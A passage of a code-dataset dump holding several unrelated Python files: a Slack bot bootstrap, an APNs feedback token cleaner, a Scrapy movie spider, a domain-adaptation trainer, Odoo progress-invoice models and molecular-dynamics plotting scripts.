format=config.logging['format'],\n datefmt=config.logging['date_format'],\n handlers=handlers)\n\n logging.getLogger('schedule').setLevel(logging.WARN)\n\n # Initialize channel filter\n channel_config = config['channels']\n \"\"\":type : dict\"\"\"\n channels = channel_config.get(channel_config['type'], '').replace('#', '').split(',')\n channel_filter = channel.Filter(channel_config['type'], channels, channel_config['direct_messages'])\n\n logging.info('Starting slake bot')\n try:\n bot.start(config.slack['token'], channel_filter)\n except ConnectionError:\n logging.critical(\"Failed to connect to Slack. Make sure you're connected to the Internet and have specified the correct Slack API key in \"\n \"your configuration.\")\n return False\n except KeyboardInterrupt:\n return True\n except:\n logging.exception('An error occurred while starting slake')\n return False\n","sub_path":"slake/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"80112889","text":"import logging\nimport sys\nimport time\nfrom logging.config import fileConfig\nfrom configparser import ConfigParser\n\nfrom apnsclient import *\n\nimport psycopg2\nimport psycopg2.extras\nimport OpenSSL\nOpenSSL.SSL.SSLv3_METHOD = OpenSSL.SSL.TLSv1_METHOD\n\n\ndef get_last_update_of_token(token):\n cur.execute(\"SELECT create_time FROM device.device_pushbinding WHERE client_id = %s\", (token, ))\n result = cur.fetchone()\n if result:\n return result['create_time']\n else:\n return None\n\ndef remove_token(token):\n cur.execute(\"DELETE FROM device.device_pushbinding WHERE client_id = %s\", (token, ))\n\n\n\nif __name__ == \"__main__\":\n fileConfig('config.ini')\n logger = logging.getLogger()\n logger.debug(\"启动IOS feedback服务\")\n\n logger.debug(\"加载配置\")\n config = ConfigParser()\n config.read('config.ini')\n\n use_sandbox = config.getboolean(\"general\", \"use_sandbox\")\n\n\n\n\n conn = psycopg2.connect(database=config.get(\"db\", \"dbname\"),\n user=config.get(\"db\", \"username\"),\n password=config.get(\"db\", \"password\"),\n port=config.getint(\"db\", 'port'),\n host=config.get(\"db\", \"host\"))\n conn.autocommit = True\n\n cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n while True:\n try:\n logger.debug(\"开始连接feedback\")\n # feedback needs no persistent connections.\n session = Session()\n\n con = session.new_connection(\"feedback_sandbox\" if use_sandbox else \"feedback_production\",\n cert_file=\"certs/ck_dev.pem\" if use_sandbox else \"certs/ck_pro.pem\",\n passphrase=config.get(\"general\", \"passphrase\"))\n\n srv = APNs(con)\n\n # on any IO failure after successfull connection this generator\n # will simply stop iterating. you will pick the rest of the tokens\n # during next feedback session.\n logger.info(\"遍历feedback返回token列表\")\n for token, when in srv.feedback():\n token = token.decode()\n logger.info(\"处理Token: %s\", token)\n # every time a devices sends you a token, you should store\n # {token: given_token, last_update: datetime.datetime.now()}\n last_update = get_last_update_of_token(token)\n\n if last_update is not None and last_update < when:\n logger.info(\"Token: %s已经失效,从数据库中移除, 上次更新时间: %s, 发生错误时间: %s\", token, last_update, when)\n # the token wasn't updated after the failure has\n # been reported, so the token is invalid and you should\n # stop sending messages to it.\n # device_push_binding\n remove_token(token)\n except Exception:\n exc_type, exc_value, exc_tb = sys.exc_info()\n logger.error(\"处理 %s 异常,内容:%s, 行数: %d\", exc_type.__name__, exc_value, exc_tb.tb_lineno)\n finally:\n time.sleep(60)\n\n cur.close()\n conn.close()\n","sub_path":"ios_feedback.py","file_name":"ios_feedback.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"140696485","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.selector import Selector\nfrom scrapy_project.items import ScrapyProjectItem\nimport os\n\n\nclass MaoyanSpider(scrapy.Spider):\n name = 'maoyan'\n allowed_domains = ['maoyan.com']\n start_urls = ['https://maoyan.com/films?showType=3&offset=0']\n \n \n\n def start_request(self):\n # self.movie_num = self.settings.get('MOVIE_NUM')\n # print(self.movie_num)\n # page_num = (self.movie_num - 1)//30\n # for i in range(page_num + 1):\n # url = f'https://maoyan.com/films?showType=3&offset={i * 30}'\n # yield scrapy.Request(url=url, meta={'currentpage': i}, callback=self.parse)\n #问题:下面读取meta不对\n url = 'https://maoyan.com/films?showType=3&offset=0'\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=False)\n \n \n # 解析函数\n def parse(self, response):\n # print('测试数据:' + str(response.meta))\n # current_page = response.meta['currentpage']\n # self.movie_num = self.settings.get('MOVIE_NUM')\n # current_page_num = self.movie_num - current_page * 30\n selector_info = Selector(response=response)\n item = ScrapyProjectItem()\n for i, tags in enumerate(selector_info.xpath('//div[@class=\"movie-hover-info\"]')):\n if i >= 10: #读取10个电影,本想用current_page_num但有问题还未解决\n break\n for tag in tags.xpath('./div'):\n movie_name = tag.xpath('./@title').extract_first()\n print(movie_name)\n div_text = tag.xpath('./text()').extract()\n span_text = tag.xpath('./span/text()').extract_first()\n if span_text == '类型:':\n movie_type = div_text[1].strip()\n print(movie_type)\n if span_text == '上映时间:':\n movie_time = div_text[1].strip()\n print(movie_time)\n item['movie_name'] = movie_name\n item['movie_type'] = movie_type\n item['movie_time'] = movie_time\n yield item\n","sub_path":"week01/scrapy_project/scrapy_project/spiders/maoyan.py","file_name":"maoyan.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"204335983","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__author__ = '{Jimmy Yeh}'\n__email__ = '{marrch30@gmail.com}'\n\"\"\"\n\nfrom dann_module.addamodel import ADDA \nfrom dann_module.datafunc import make_dataloaders\nfrom tqdm import tqdm\nimport torch\nimport os\n\nfrom math import sqrt\n\ntorch.manual_seed(7)\ntorch.cuda.manual_seed_all(100)\ntorch.backends.cudnn.deterministic = True \n\nclass Trainer():\n def __init__(self, args):\n self.model = ADDA()\n self.optimizer = torch.optim.Adam(\n list(self.model.encoder.parameters()) \\\n + list(self.model.classifier.parameters()),\n )\n self.ten_optimizer = torch.optim.Adam(self.model.tencoder.parameters())\n self.tel_optimizer = torch.optim.Adam(self.model.teller.parameters())\n \n self.criterion = torch.nn.CrossEntropyLoss()\n\n dataloaders = make_dataloaders(args.source, args.target, args.batch_size)\n self.sourceloader, self.targetloader, self.testtargetloader = dataloaders\n\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.model.to(self.device)\n self.criterion.to(self.device)\n self.args = args\n self.modelpath = os.path.join('ckpt', args.taskname, 'model_%s_%s.pth'%(args.source[:1], args.target[:1]))\n self.bestpath = os.path.join('ckpt', args.taskname, 'best_%s_%s.pth'%(args.source[:1], args.target[:1]))\n self.dstep = 1\n self.tstep = 1\n\n def train(self):\n print('%s --> %s'%(self.args.source, self.args.target))\n best_acc = 0\n for i in range(1):\n self.train_one_epoch(i)\n for i in range(1):\n self.adjust_one_epoch(i)\n\n acc, loss = self.test()\n print(acc)\n\n\n # bbar = tqdm(range(self.args.epochs), ncols=100)\n # for epoch in bbar:\n # train_acc, train_loss = self.train_one_epoch(epoch)\n # dom_acc, dom_loss, tar_acc, tar_loss = self.adjust_one_epoch(epoch)\n # acc, test_loss = self.test()\n\n # self.model.save(self.modelpath)\n # if acc > best_acc:\n # best_acc = acc\n # torch.save(self.model.state_dict(), self.bestpath)\n # bbar.set_postfix(ac=acc, bacc=best_acc, dac=dom_acc, tar=tar_acc, tracc=train_acc)\n\n def train_one_epoch(self, epoch):\n self.model.train()\n pbar = tqdm(self.sourceloader, ncols=100, desc='tr'+str(epoch))\n \n for img, label in pbar:\n img, label = img.to(self.device), label.to(self.device)\n self.optimizer.zero_grad()\n output = self.model(img)\n loss = self.criterion(output, label)\n\n loss.backward()\n self.optimizer.step()\n acc = output.argmax(1).eq(label).sum()*100//len(label)\n pbar.set_postfix(loss=loss.item(), acc=acc.item())\n\n self.model.copy_target()\n return acc.item(), loss.item()\n\n def adjustpq(self, dom_acc, tar_acc):\n self.dstep = sqrt((1-dom_acc)*5) + 1\n if tar_acc > 0.8:\n self.tstep -= 0.1\n self.tstep = max(1, self.tstep)\n if tar_acc > 0.9:\n self.tstep -= 0.1\n self.tstep = max(1, self.tstep)\n\n if tar_acc < 0.5:\n self.tstep += 0.1\n else:\n self.tstep = min(3, self.tstep)\n if tar_acc < 0.4:\n self.tstep += 0.1\n else:\n self.tstep = min(3, self.tstep)\n if tar_acc < 0.3:\n self.tstep += 0.2\n else:\n self.tstep = min(4, self.tstep)\n if tar_acc < 0.2:\n self.tstep += 0.3\n else:\n self.tstep = min(6, self.tstep)\n if tar_acc < 0.1:\n self.tstep += 0.4\n else:\n self.tstep = min(8, self.tstep)\n if tar_acc < 0.05:\n self.tstep += 0.5\n else:\n self.tstep = min(11, self.tstep)\n\n def adjust_one_epoch(self, epoch):\n self.model.train()\n num_iteration = min(len(self.sourceloader), len(self.targetloader))\n pbar = tqdm(range(num_iteration), ncols=100, desc='adj'+str(epoch))\n\n for i in pbar:\n for __ in range(int(self.dstep)):\n timg, __ = next(iter(self.targetloader))\n simg, __ = next(iter(self.sourceloader))\n timg, simg = timg.to(self.device), simg.to(self.device)\n batch_size = len(timg)\n\n # train teller\n self.tel_optimizer.zero_grad()\n source_dom = self.model(simg, mode='domains')\n target_dom = self.model(timg, mode='domain')\n \n domain_label = torch.ones(batch_size).long().to(self.device)\n src_dom_loss = self.criterion(source_dom, domain_label)\n src_acc = source_dom.argmax(1).eq(domain_label).float().mean().item()\n\n domain_label = torch.zeros(batch_size).long().to(self.device)\n tar_dom_loss = self.criterion(target_dom, domain_label)\n tar_acc = target_dom.argmax(1).eq(domain_label).float().mean().item()\n\n dom_loss = (src_dom_loss + tar_dom_loss)/2\n\n dom_loss.backward()\n self.tel_optimizer.step()\n\n dom_acc = (src_acc + tar_acc)/2\n\n\n ## train tencoder\n for __ in range(int(self.tstep)):\n self.ten_optimizer.zero_grad()\n self.tel_optimizer.zero_grad()\n\n dom_output = self.model(timg, mode='domain')\n domain_label = torch.ones(batch_size).long().to(self.device)\n\n tar_loss = self.criterion(dom_output, domain_label)\n tar_loss.backward()\n tar_acc = dom_output.argmax(1).eq(domain_label).float().mean().item()\n self.ten_optimizer.step()\n\n # self.adjustpq(dom_acc, tar_acc)\n pbar.set_postfix(dom_acc=dom_acc, tar_acc=tar_acc, dstep=self.dstep, tstep=self.tstep)\n\n\n return dom_acc, dom_loss.item(), tar_acc, tar_loss.item()\n\n def test(self):\n self.model.eval()\n loss = 0 \n acc = 0\n length = 0\n pbar = tqdm(self.testtargetloader, ncols=100, desc='test')\n for images, labels in pbar:\n images, labels = images.to(self.device), labels.to(self.device)\n output = self.model(images, mode='target')\n loss += self.criterion(output, labels).item()\n\n pred = output.argmax(1)\n acc += pred.eq(labels).sum().item()\n length += len(labels)\n\n loss /= length\n acc /= length\n return acc, loss\n\n\n\n","sub_path":"src/00template/module/gbin/addaxxtrainer.py","file_name":"addaxxtrainer.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"156314633","text":"# Copyright (c) 2019-present, Zhiqiang Wang.\n\nfrom fairseq.criterions import FairseqCriterion, register_criterion\n\n\n@register_criterion('fasterrcnn_loss')\nclass FasterRCNNLoss(FairseqCriterion):\n\n def __init__(self, args, task):\n super(FairseqCriterion, self).__init__()\n self.args = args\n\n def forward(self, model, sample, reduction='mean'):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n\n def compute_loss(self):\n pass\n\n @staticmethod\n def aggregate_logging_outputs(logging_outputs):\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n assert len(logging_outputs) == 1\n log = logging_outputs[0]\n loss = log.get('loss', 0)\n ntokens = log.get('ntokens', 0)\n batch_sizes = log.get('nsentences', 0)\n sample_size = log.get('sample_size', 0)\n agg_output = {\n 'loss': loss,\n 'ntokens': ntokens,\n 'nsentences': batch_sizes,\n 'sample_size': sample_size,\n }\n return agg_output\n","sub_path":"sightseq/criterions/fasterrcnn_loss.py","file_name":"fasterrcnn_loss.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"527432976","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, Warning\nfrom odoo.tools import email_re, email_split, email_escape_char, float_is_zero, float_compare, \\\n pycompat, date_utils\n\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\n @api.model\n def _default_journal(self):\n journal_type = self._context.get('journal_type', False)\n progress_invoice = self._context.get('default_progress_invoice', False)\n company_id = self._context.get('company_id', self.env.user.company_id.id)\n\n if journal_type and journal_type == 'purchase' and progress_invoice:\n return self.env['account.journal'].search(\n [('type', '=', 'purchase'), ('progress_invoice', '=', True), ('company_id', '=', company_id)],\n limit=1)\n else:\n return super(AccountInvoice, self)._default_journal()\n\n # @api.one\n # @api.depends('partner_id', 'subcontract_requisition_id')\n # def _compute_former_invoice(self):\n # domain = [('partner_id', '=', self.partner_id.id), ('progress_invoice', '=', True), ('state', 'not in', ['draft', 'cancel'])]\n # if self.subcontract_requisition_id:\n # domain.append(('subcontract_requisition_id', '=', self.subcontract_requisition_id.id))\n # self.former_invoice_id = self.search(domain, limit=1, order=\"id desc\")\n\n @api.one\n @api.depends('partner_id')\n def _compute_balance(self):\n moawlyen_account_code = 21004\n domain = [('code', '=', moawlyen_account_code),\n ('internal_type', 'in', ['receivable', 'payable'])]\n account_ids = self.env['account.account'].search(domain)\n domain = [('analytic_account_id', '=', self.account_analytic_id.id),\n ('partner_id', '=', self.partner_id.id),\n ('company_id', '=', self.company_id.id)]\n move_line_ids = self.env['account.move.line'].search(domain).filtered(\n lambda r: r.account_id.id in account_ids.ids)\n self.partner_balance = sum(move_line_ids.mapped('debit')) - sum(move_line_ids.mapped('credit'))\n\n @api.one\n # @api.depends('partner_balance', 'amount_total')\n def _compute_est_balance(self):\n self.est_balance = (self.partner_balance or 0.0) - self.amount_total\n\n # state = fields.Selection(selection_add=[('waiting_inv_approval', 'Waiting Approval'), ('inv_approved', 'Approved')])\n state = fields.Selection([\n ('draft','Draft'),\n ('waiting_inv_approval', 'Waiting Approval'),\n ('inv_approved', 'Approved'),\n ('open', 'Open'),\n ('in_payment', 'In Payment'),\n ('paid', 'Paid'),\n ('cancel', 'Cancelled'),\n ], string='Status', index=True, readonly=True, default='draft',\n track_visibility='onchange', copy=False,\n help=\" * The 'Draft' status is used when a user is encoding a new and unconfirmed Invoice.\\n\"\n \" * The 'Open' status is used when user creates invoice, an invoice number is generated. It stays in the open status till the user pays the invoice.\\n\"\n \" * The 'In Payment' status is used when payments have been registered for the entirety of the invoice in a journal configured to post entries at bank reconciliation only, and some of them haven't been reconciled with a bank statement line yet.\\n\"\n \" * The 'Paid' status is set automatically when the invoice is paid. Its related journal entries may or may not be reconciled.\\n\"\n \" * The 'Cancelled' status is used when user cancel invoice.\")\n account_analytic_id = fields.Many2one('account.analytic.account', string='Project')\n progress_type = fields.Selection([('ongoing', 'Ongoing'), ('final', 'Final'), ('opening', 'Opening')],\n string='Progress Type')\n date_from = fields.Date('Date From')\n date_to = fields.Date('Date To')\n partner_account = fields.Many2one(related=\"partner_id.property_account_payable_id\")\n payment_ref = fields.Char('Payment Reference')\n partner_balance = fields.Monetary(string='Partner Balance', compute=_compute_balance)\n former_invoice_id = fields.Many2one('account.invoice', string='Former Invoice')\n # former_invoice_id = fields.Many2one('account.invoice', string='Former Invoice', compute=_compute_former_invoice, store=True)\n progress_invoice = fields.Boolean('Progress Invoice')\n journal_id = fields.Many2one('account.journal', string='Journal',\n required=True, readonly=True, states={'draft': [('readonly', False)]},\n default=_default_journal,\n domain=\"[('type', 'in', {'out_invoice': ['sale'], 'out_refund': ['sale'], 'in_refund': ['purchase'], 'in_invoice': ['purchase']}.get(type, [])), ('company_id', '=', company_id)]\")\n sequence_number_next = fields.Char(string='Next Number', compute=\"_get_sequence_number_next\", inverse=\"_set_sequence_next\", readonly=True, store=True)\n number = fields.Char('Number')\n number2 = fields.Char('Number')\n est_balance = fields.Monetary(string='Estimated Balance', compute=_compute_est_balance)\n\n def send_inv_approval(self):\n self.state = \"waiting_inv_approval\"\n\n def confirm_inv_approval(self):\n if self.user_has_groups('progress_invoice.group_manage_inv_approval'):\n self.state = \"inv_approved\"\n else:\n raise Warning(\"You don't have permission to approve. please enable from User Settings\")\n\n @api.multi\n def action_invoice_open(self):\n res = super(AccountInvoice, self).action_invoice_open()\n\n for inv in self:\n if inv.subcontract_requisition_id and inv.progress_invoice:\n for line in inv.invoice_line_ids:\n requisition_line_ids = inv.subcontract_requisition_id.line_ids.filtered(lambda r: r.product_id == line.product_id and r.sequence == line.sequence )\n requisition_line_ids._compute_ordered_qty()\n requisition_line_ids._compute_ordered_price()\n for scr_line in requisition_line_ids:\n if scr_line.product_qty < scr_line.qty_invoiced:\n raise Warning(_(\"You can't exceed the Contract quantity, please contact your administrator.\"))\n if (scr_line.product_qty * scr_line.price_unit) < scr_line.price_invoiced:\n raise Warning(_(\"You can't exceed the Contract amount, please contact your administrator\"))\n return res\n\n @api.onchange('partner_id', 'subcontract_requisition_id')\n def _onchange_subcontract_requisition_id(self):\n former_invoice_id = False\n domain = [('progress_invoice', '=', True), ('state', 'not in', ['draft', 'cancel'])]\n if self.partner_id:\n domain.append(('partner_id', '=', self.partner_id.id))\n if self.subcontract_requisition_id:\n domain.append(('subcontract_requisition_id', '=', self.subcontract_requisition_id.id))\n if self.partner_id or self.subcontract_requisition_id:\n former_invoice_id = self.search(domain, limit=1, order=\"id desc\")\n return {\n 'value': {'former_invoice_id': former_invoice_id},\n 'domain': {'former_invoice_id': [('subcontract_requisition_id', '=', self.subcontract_requisition_id and self.subcontract_requisition_id.id)]},\n }\n\n @api.multi\n def xmlrpc_onchange_invoice_line_ids(self):\n self._onchange_invoice_line_ids()\n return True\n\n\nclass AccountInvoiceLine(models.Model):\n _inherit = 'account.invoice.line'\n\n @api.one\n @api.depends('invoice_id.former_invoice_id')\n def _get_previous_qty(self):\n if self.invoice_id.former_invoice_id:\n lines = self.invoice_id.former_invoice_id.invoice_line_ids.filtered(lambda r: r.product_id.id == self.product_id.id and r.line_sequence == self.line_sequence and r.price_unit == self.price_unit)\n self.prev_qty = sum(lines.mapped('total_qty'))\n else: # if not self.invoice_id.former_invoice_id:\n\n contract_ids = self.env['subcontract.requisition'].search([('id', '=', self.invoice_id.subcontract_requisition_id.id)])\n for rec in self:\n for contract in contract_ids.line_ids:\n if rec.product_id.id == contract.product_id.id and rec.line_sequence==contract.sequence:\n rec.prev_qty = contract.previ_qty#rec.invoice_id.subcontract_requisition_id.previ_qty\n\n @api.multi\n def xmlrpc_compute_total_qty(self):\n self._get_total_qty()\n return True\n\n @api.one\n @api.depends('prev_qty', 'quantity')\n def _get_total_qty(self):\n self.total_qty = self.quantity + self.prev_qty\n\n @api.one\n @api.depends('invoice_id.former_invoice_id')\n def _get_previous_amount(self):\n if self.invoice_id.former_invoice_id:\n lines = self.invoice_id.former_invoice_id.invoice_line_ids.filtered(lambda r: r.product_id.id == self.product_id.id and r.line_sequence == self.line_sequence and r.price_unit == self.price_unit)\n self.prev_amount = sum(lines.mapped('total_amount'))\n else: # if self.invoice_id.former_invoice_id == False:\n\n contract_ids = self.env['subcontract.requisition'].search(\n [('id', '=', self.invoice_id.subcontract_requisition_id.id)])\n for rec in self:\n for contract in contract_ids.line_ids:\n if rec.product_id.id == contract.product_id.id and rec.line_sequence==contract.sequence:\n rec.prev_amount = contract.previ_amount\n # self.prev_amount = self.invoice_id.subcontract_requisition_id.prev_amount\n\n\n\n @api.one\n @api.depends('price_unit', 'total_qty', 'percentage')\n def _get_total_amount(self):\n percentage = (self.percentage / 100) if self.percentage else 1\n self.total_amount = self.price_unit * self.total_qty * percentage\n\n @api.one\n @api.depends('price_unit', 'discount', 'invoice_line_tax_ids', 'quantity', 'product_id', 'invoice_id.partner_id',\n 'invoice_id.currency_id', 'invoice_id.company_id', 'invoice_id.date_invoice', 'invoice_id.date',\n 'prev_amount', 'total_amount')\n def _compute_price(self):\n super(AccountInvoiceLine, self)._compute_price()\n if self.invoice_id.progress_invoice:\n self.price_subtotal = self.total_amount - self.prev_amount\n\n cost_code = fields.Many2one('subcontract.code', string=\"Cost Code\")\n prev_qty = fields.Float('Previous Quantity', compute='_get_previous_qty')\n percentage = fields.Float('Percentage')\n total_qty = fields.Float('Total Quantity', store=True, compute='_get_total_qty')\n prev_amount = fields.Monetary(string='Previous Amount', compute='_get_previous_amount')\n total_amount = fields.Monetary(string='Total Amount', store=True, compute='_get_total_amount')\n\nclass AccountJournal(models.Model):\n _inherit = 'account.journal'\n\n progress_invoice = fields.Boolean('Is Progress Invoice?')\n","sub_path":"addons/progress_invoice/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"432938747","text":"from ROOT import TCanvas, TPad, TFormula, TF1, TPaveLabel, TH1F, TH2F, TFile, TColor\nfrom ROOT import gROOT, gBenchmark, gStyle, gRandom, gPad\nimport numpy as np\nfrom array import array \nmA_ticks = [100, 200, 300, 350, 500, 650, 800, 1000, 1500, 2000, 2500, 3000, 3500]\nma_ticks = [1, 50, 100, 150, 200, 400, 600, 800]\ndef set_palette(name=\"\", ncontours=999):\n \"\"\"Set a color palette from a given RGB list\n stops, red, green and blue should all be lists of the same length\n see set_decent_colors for an example\"\"\"\n\n if name == \"gray\" or name == \"grayscale\":\n stops = [0.00, 0.34, 0.61, 0.84, 1.00]\n red = [1.00, 0.84, 0.61, 0.34, 0.00]\n green = [1.00, 0.84, 0.61, 0.34, 0.00]\n blue = [1.00, 0.84, 0.61, 0.34, 0.00]\n # elif name == \"whatever\":\n # (define more palettes)\n else:\n # default palette, looks cool\n stops = [0.00, 0.34, 0.61, 0.84, 1.00]\n #red = [0.00, 0.00, 0.87, 1.00, 0.51]\n red = [0.00, 0.00, 0.0, 0.00, 0.0]\n green = [0.00, 0.81, 1.00, 0.20, 0.00]\n blue = [0.51, 1.00, 0.12, 0.00, 0.00]\n\n s = array('d', stops)\n r = array('d', red)\n g = array('d', green)\n b = array('d', blue)\n\n npoints = len(s)\n TColor.CreateGradientColorTable(npoints, s, r, g, b, ncontours)\n gStyle.SetNumberContours(ncontours)\n\ndef make_plot(channel = '', year='2017', data_obs=[], data_exp=[], data_exp_p1=[], data_exp_m1=[]):\n c03 = TCanvas(\"c03\",\"c03\", 1200, 900)\n gStyle.SetOptStat(0)\n #set_palette()\n #gStyle.SetNumberContours(255)\n #palette = [15, 20, 23, 30, 32]\n gStyle.SetPalette(57)\n gStyle.SetNumberContours(999)\n #gStyle.SetPalette(\"kBird\")\n\n xi = [i for i in range(len(mA_ticks))]\n yi = [i for i in range(len(ma_ticks))]\n \n _year = year\n if _year=='20172018':\n _year = '2017+2018'\n h_col = TH2F(\"h_col\",\"Zprime Baryonic Limit \"+channel+\" \"+_year, len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n obs = TH2F(\"obs\",\"obs\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n exp = TH2F(\"exp\",\"exp\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n exp_p1 = TH2F(\"exp_p1\",\"exp_p1\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n exp_m1 = TH2F(\"exp_m1\",\"exp_m1\",len(mA_ticks), 0, len(mA_ticks), len(ma_ticks), 0, len(ma_ticks))\n data_obs = np.array(data_obs)\n data_exp = np.array(data_exp)\n data_exp_p1 = np.array(data_exp_p1)\n data_exp_m1 = np.array(data_exp_m1)\n \n for i in range(len(mA_ticks)):\n for j in range(len(ma_ticks)):\n mA = i\n ma = j\n #h_col.Fill(mA, ma, round(data_obs[i][j], 3))\n #print mA, ma, data_obs[i][j]\n #obs.Fill(mA, ma, data_obs[i][j])\n h_col.Fill(mA, ma, round(data_exp[i][j],3))\n exp.Fill(mA, ma, round(data_exp[i][j],3))\n exp_p1.Fill(mA, ma, round(data_exp_p1[i][j],3))\n exp_m1.Fill(mA, ma, round(data_exp_m1[i][j],3))\n \n for i in range(len(mA_ticks)):\n h_col.GetXaxis().SetBinLabel(i+1, str(mA_ticks[i]))\n for i in range(len(ma_ticks)):\n h_col.GetYaxis().SetBinLabel(i+1, str(ma_ticks[i]))\n\n\n gPad.SetLogz(1)\n h_col.GetZaxis().SetRangeUser(0.1, 10000);\n h_col.Draw(\"COLZ\")\n # write obs\n # obs.SetMarkerSize(0.9)\n # obs.SetMarkerColor(4)\n # obs.SetBarOffset(0.1)\n # obs.Draw(\"TEXT SAME\")\n # write exp\n exp.SetMarkerSize(0.9)\n exp.SetMarkerColor(1)\n exp.SetBarOffset(-0.1)\n exp.Draw(\"TEXT SAME\")\n # write exp_p1\n exp_p1.SetMarkerSize(0.9)\n exp_p1.SetMarkerColor(2)\n exp_p1.SetBarOffset(0.3)\n exp_p1.Draw(\"TEXT SAME\")\n # write exp_m1\n exp_m1.SetMarkerSize(0.9)\n exp_m1.SetMarkerColor(2)\n exp_m1.SetBarOffset(-0.3)\n exp_m1.Draw(\"TEXT SAME\")\n \n h_col.GetXaxis().SetTitle('m Zp [GeV]')\n h_col.GetYaxis().SetTitle('m Chi [GeV]')\n gPad.SetGrid()\n gPad.SetRightMargin(0.2) \n c03.SaveAs(\"zprimeb_limit_\"+channel+\"_\"+year+\".png\")\n","sub_path":"xtt_datacards_fullrange_zpb/make_2dplot.py","file_name":"make_2dplot.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"560432666","text":"import itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport figstyle\nimport os\n\ndt_scaling = 'log'\ntools = ['piny', 'openmm']\nstep_size = {'0.5': 0.5}\nlabel = {'0.5': '0.5 fs (*)'}\nfor case in ['01', '03', '06', '09', '15', '30', '45', '90']:\n step_size[case] = float(case)\n label[case] = '{} fs'.format(int(case))\n\ndef data(type, timesteps):\n repo = {tool:[] for tool in tools}\n for dt, tool in itertools.product(timesteps, tools):\n file = '{}/results/sinr-{}fs_{}.csv'.format(tool, dt.replace('.', 'p'), type)\n if os.path.isfile(file):\n repo[tool].append(pd.read_csv(file, skipinitialspace=True))\n return repo\n\n# Intermolecular radial distribution functions:\ndef plot_rdfs(timesteps):\n rdf = data('rdf', timesteps)\n fig, ax = plt.subplots(1, 1, figsize=(3.37,2.3))\n fig.suptitle(f'Radial distribution functions (openmm)')\n ax.set_xlabel('Distance (\\\\AA)')\n for dt, gr in zip(timesteps, rdf['openmm']):\n distance = gr['Distance [pm]']/100\n ax.plot(distance, gr['g(r)'], label=label[dt])\n ax.legend(loc='lower right', ncol=2)\n fig.savefig(f'openmm_rdf.png')\n\n# Bond length distributions:\ndef plot_bonds(timesteps):\n bond = data('bond', timesteps)\n for tool in tools:\n fig, ax = plt.subplots(1, 1, figsize=(3.37,2.3), sharex=True)\n fig.suptitle(f'Bond length distributions ({tool})')\n ax.set_xlabel('Distance (\\\\AA)')\n for dt, gr in zip(timesteps, bond[tool]):\n distance = gr['# Distance [pm]']/100\n ax.plot(distance, gr['g(r)'], label=label[dt])\n ax.set_ylabel(f'frequency')\n ax.legend(loc='upper left', ncol=1)\n fig.savefig(f'{tool}_bond.png')\n\n# Angle distributions:\ndef plot_angles(timesteps):\n angle = data('angle', timesteps)\n for tool in tools:\n fig, ax = plt.subplots(1, 1, figsize=(3.37,2.3), sharex=True)\n fig.suptitle(f'Angle distributions ({tool})')\n ax.set_xlabel('Angle (\\\\textdegree)')\n for dt, gr in zip(timesteps, angle[tool]):\n distance = gr['# Angle (degree)']\n ax.plot(distance, gr['Occurrence'], label=label[dt])\n ax.set_ylabel(f'frequency')\n ax.legend(loc='upper left', ncol=1)\n fig.savefig(f'{tool}_angle.png')\n\n# Combined bond-angle distributons:\ndef plot_combined(timestep_pairs):\n npairs = len(timestep_pairs)\n for tool in tools:\n fig, ax = plt.subplots(npairs, 1, figsize=(3.37,npairs*2.3), sharex=True)\n if npairs == 1:\n ax = [ax]\n fig.suptitle(f'Combined bond-angle distributions ({tool})')\n ax[-1].set_xlabel('Distance (\\\\AA)')\n for i, timesteps in enumerate(timestep_pairs):\n combined = data('combined', timesteps)\n for dt, gr, style in zip(timesteps, combined[tool], ['solid', 'dashed']):\n X = gr.values[:, 0]/100 # Distances\n Y = np.array([float(y) for y in gr.columns[1:]]) # Angles\n Z = gr.values[:, 1:]\n cs = ax[i].contour(*np.meshgrid(X, Y), Z, linestyles=style)\n cs.collections[0].set_label(label[dt])\n ax[i].set_ylabel('Angle (\\\\textdegree)')\n ax[i].legend(loc='lower left', ncol=1)\n fig.savefig(f'{tool}_combined.png')\n\n# Combined bond-bond distributons:\ndef plot_bond_bond(timestep_pairs):\n npairs = len(timestep_pairs)\n for tool in tools:\n fig, ax = plt.subplots(npairs, 1, figsize=(3.37,npairs*2.3), sharex=True)\n if npairs == 1:\n ax = [ax]\n fig.suptitle(f'Combined bond-bond distributions ({tool})')\n ax[-1].set_xlabel('Distance (\\\\AA)')\n for i, timesteps in enumerate(timestep_pairs):\n combined = data('bbdf', timesteps)\n for dt, gr, style in zip(timesteps, combined[tool], 